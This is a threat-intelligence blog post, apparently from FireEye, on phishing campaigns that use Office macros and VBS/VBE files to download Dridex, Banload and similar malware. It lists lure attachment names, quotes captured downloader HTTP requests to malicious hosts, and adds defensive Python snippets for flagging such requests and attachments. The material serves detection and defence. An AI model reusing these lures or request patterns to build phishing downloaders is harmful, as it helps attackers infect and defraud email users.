Macros Galore


The recent FBI announcement of the Dridex botnet take-down and the arrest of its administrator [1] doesn’t mean email users have seen the last of Dridex. We might see the reuse of similar phishing tactics with future malware. We have seen an overall slowdown in Dridex activity in recent months since its first noticeable campaigns in early 2015. However, throughout October we have observed a rise in the use of phishing documents with embedded macros that serve as first-stage downloaders for malware such as Banload. We shouldn’t lose sight of the successful social engineering and evasion methods used by this botnet just because it was taken down.

What Does a Macro Downloader Do?

These campaigns are multistage downloaders whose typical infiltration method consists of socially engineered emails that carry disguised attachments. Attachments typically consist of file types that allow the execution of embedded Visual Basic (VB) code, including Visual Basic script (.vbs) files, VBScript Encoded (.vbe) files, and Microsoft Office documents with embedded Visual Basic macros. When the code executes, it contacts a server to download and execute the malware payload. This method has frequently been used to install malware such as Dridex, Dyre, and Banload. Figure 1 illustrates the downloader concept.

Figure 1. The concept of the downloader

Email Body

Figure 2. An example of a phishing email

The phishing emails focus on convincing the user to download and open the attachments; Figure 2 shows an example. Attachment names usually correspond to the email subject and include a randomized number at the end of the file name. Spam campaign themes often refer to picture and movie files, government documents, potentially sensitive information such as court papers, resumes, and shipment orders. Here are a few file names used in recent campaigns:

    Mirian_resume_1700.doc
    ACH_Payment_0067855YKwcod..vbs
    remit network report.pdf.vbs
    adam.champion_OK_5072.doc
    marketing.it_GO_1793.doc
    ian.marchant_QR_4940.doc
    janetcard_FE700F.xls
    2via_Boleto_Ref-01237.vbs
    DSC283751726313.vbs
    MOV90472251.vbs
    Proposta_comercial00734133.vbs
    Rendimentos1827349154.vbs
    pendencias01726324.vbe
    comunicado01726315.vbe
    SolicitaÆo_de_2¦_via_Boleto_pdf.vbe
    Arquivo_Comprovante_deposito0128971256.vbe

Microsoft Office documents containing macros are often password protected, while VBS/VBE files are obfuscated beyond readability, as shown in Figure 3. Both methods may allow the files to evade antivirus detection. VBS and VBE files will execute immediately upon opening, as will Office macros if the victim has macros enabled. Otherwise, the victim will receive a prompt asking if they want to run the macro.

Figure 3. Dridex ActiveMime

Figure 4. Obfuscated VisualBasic script (.vbs) file

HTTP Request Variation

The downloaders make HTTP GET or HTTP POST requests to retrieve the malware payload. However, as shown in Figure 4, the details of the request vary widely across samples. This makes it harder to create network-based signatures and helps the downloader avoid detection. Notice in Example 2 below that the “GET” request uses a double “EE.”

Example 1

GET /01/hits.html HTTP/1.1
Connection: Keep-Alive
Content-Type: text/plain; Charset=UTF-8
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: sfgbfhysf.systemy1201.in

Example 2

GEET /bt/bt/sp_index.php HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; InfoPath.2)
Host: 136.243.219.233
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache

Example 3

POST /download.php?i=V8XHfsL1 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: pastebin.com
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
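The request traits the three examples above have in common (a misspelled method, a bare WinHTTP User-Agent, an IP literal as Host, body headers on a bodyless request) are what a defender can key on even when paths and hosts change. The following is an added example, not code from the original post: a small heuristic scorer over raw request headers as a proxy or IDS would log them. The heuristic names, the header checks and the sample request are this example's own choices.

```python
# Added example (not from the original post): heuristic scorer for HTTP
# request headers, tuned to the traits of the downloader requests quoted
# above. Heuristic names and thresholds are this example's own assumptions.
import re

STANDARD_METHODS = {"GET", "POST", "HEAD", "PUT", "DELETE", "OPTIONS", "CONNECT"}
# Bare WinHTTP/MSXML agents are what a VBS/VBE dropper presents by default;
# a browser-style string can be faked, so this is one signal among several.
SCRIPT_UA = re.compile(r"WinHttp\.WinHttpRequest|MSXML", re.I)
IP_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")

def parse_request(raw):
    """Split one raw request into (method, path, {lower-cased name: value})."""
    lines = [ln for ln in raw.strip().splitlines() if ln.strip()]
    parts = lines[0].split(" ", 2) + ["", ""]      # pad a malformed request line
    method, path = parts[0], parts[1]
    headers = {}
    for ln in lines[1:]:
        name, _, value = ln.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers

def score_request(raw):
    """Return the names of the heuristics a request trips (empty = nothing flagged)."""
    method, _path, h = parse_request(raw)
    hits = []
    if method not in STANDARD_METHODS:
        hits.append("nonstandard-method")          # "GEET" in Example 2
    if SCRIPT_UA.search(h.get("user-agent", "")):
        hits.append("script-user-agent")           # WinHttpRequest.5 in Example 1
    if IP_HOST.match(h.get("host", "")):
        hits.append("ip-literal-host")             # raw IP as Host in Example 2
    if method == "GET" and ("content-type" in h or "content-length" in h):
        hits.append("body-headers-on-get")         # Content-Type on a GET (Example 1)
    if method == "POST" and h.get("content-length") == "0":
        hits.append("empty-post")                  # bodyless POST to download.php
    return hits

# Constructed sample modelled on Example 2 above (headers trimmed).
SAMPLE_GEET = """GEET /bt/bt/sp_index.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 136.243.219.233
Content-Length: 0
Connection: Keep-Alive"""
```

Run `score_request` over each request in a proxy log and alert on two or more hits; a single hit (an IP literal alone, say) is too noisy to page on.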

Unique Malicious VBS/VBE Since August 2015

Even after the announcement of the Dridex botnet take-down, we are still seeing the use of Visual Basic downloaders. In Figure 5, the red area represents the number of unique hashes seen by FireEye, while the blue area represents the portion seen by open source malware repositories. The average lag time is 47 hours between when a sample was first seen by FireEye and when it was first seen in the open source repository.

Figure 5. First Seen FireEye vs. Open Source Repository

Figure 6. Distribution of Malware Based on File Types

Malicious VBS/VBE Downloaders Seen Across Various Industries

Spam campaigns, by their nature, are broad-based and generally have no specific target. However, this also means that they can potentially impact any organization. Figure 7 shows that campaigns involving VBS/VBE downloaders are seen across numerous industries. Some industries may have fortified their networks with well-known antivirus solutions; however, it is dynamic and generic detection that catches the first instance of malware.

Figure 7. Distribution of VBS/VBE downloaders across industries

How to Avoid Future Dridex-like Malware?

FireEye recommends:

  • Always confirm the identity or source of the email.
  • Verify that attachment file extensions reflect the actual file type.
  • Modify security policies to disable the use of macros.
  • Educate users to disable or implement macro security in Office applications.
  • Consider a detection system that has the ability to detect multistage malware in phishing and spam campaigns, like the FireEye Email Security Solution.
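Two of the recommendations above, checking that an attachment's extension reflects its actual type and keeping macro-bearing documents away from users, can be applied at the mail gateway before anything reaches a desktop. The block below is an added example, not FireEye's code: a triage function that flags the patterns in the file-name list earlier in the post (script extensions, `report.pdf.vbs`-style double extensions, a `.doc` whose bytes are not an OLE container) and does a crude scan for a VBA project stream. The extension sets, magic bytes, macro heuristic and sample bytes are this example's own assumptions.

```python
# Added example (not from the original post): attachment triage applying the
# "extension reflects the file type" check to the kinds of names quoted above.
# Extension lists, magic bytes and the macro heuristic are this example's own
# assumptions, not a vendor ruleset.

# Extensions Windows Script Host runs on double-click (the post's .vbs/.vbe).
SCRIPT_EXT = {".vbs", ".vbe"}
# Leading bytes expected for the document types the campaigns imitate.
MAGIC = {
    "ole": b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1",  # legacy .doc/.xls container
    "zip": b"PK\x03\x04",                          # .docx/.xlsx (OOXML)
    "pdf": b"%PDF",
}
EXPECTED = {".doc": "ole", ".xls": "ole", ".docx": "zip", ".xlsx": "zip", ".pdf": "pdf"}
# Crude stream-name scan for a VBA project inside an OLE file; a production
# check should walk the OLE directory (e.g. with oletools) rather than grep bytes.
VBA_MARKER = "_VBA_PROJECT".encode("utf-16-le")

def extensions(name):
    """All dotted suffixes, lower-cased, skipping empty ones ('x..vbs' -> ['.vbs'])."""
    return ["." + p for p in name.lower().split(".")[1:] if p]

def sniff(data):
    return next((k for k, sig in MAGIC.items() if data.startswith(sig)), "unknown")

def triage(name, data=b""):
    """Return the findings for one attachment; an empty list means nothing flagged."""
    exts = extensions(name)
    findings = []
    if exts and exts[-1] in SCRIPT_EXT:
        findings.append("script-extension")
    if len(exts) > 1 and exts[-2] in EXPECTED:        # report.pdf.vbs style
        findings.append("double-extension")
    if data and exts and exts[-1] in EXPECTED and sniff(data) != EXPECTED[exts[-1]]:
        findings.append("content-mismatch")           # e.g. MIME text named .doc
    if data.startswith(MAGIC["ole"]) and VBA_MARKER in data:
        findings.append("macro-indicator")
    return findings

# Constructed sample bytes: an OLE header followed by a VBA stream name.
SAMPLE_XLS_WITH_MACRO = MAGIC["ole"] + b"\x00" * 24 + VBA_MARKER + b"\x00" * 8
```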

[1] https://www.fbi.gov/pittsburgh/press-releases/2015/bugat-botnet-administrator-arrested-and-malware-disabled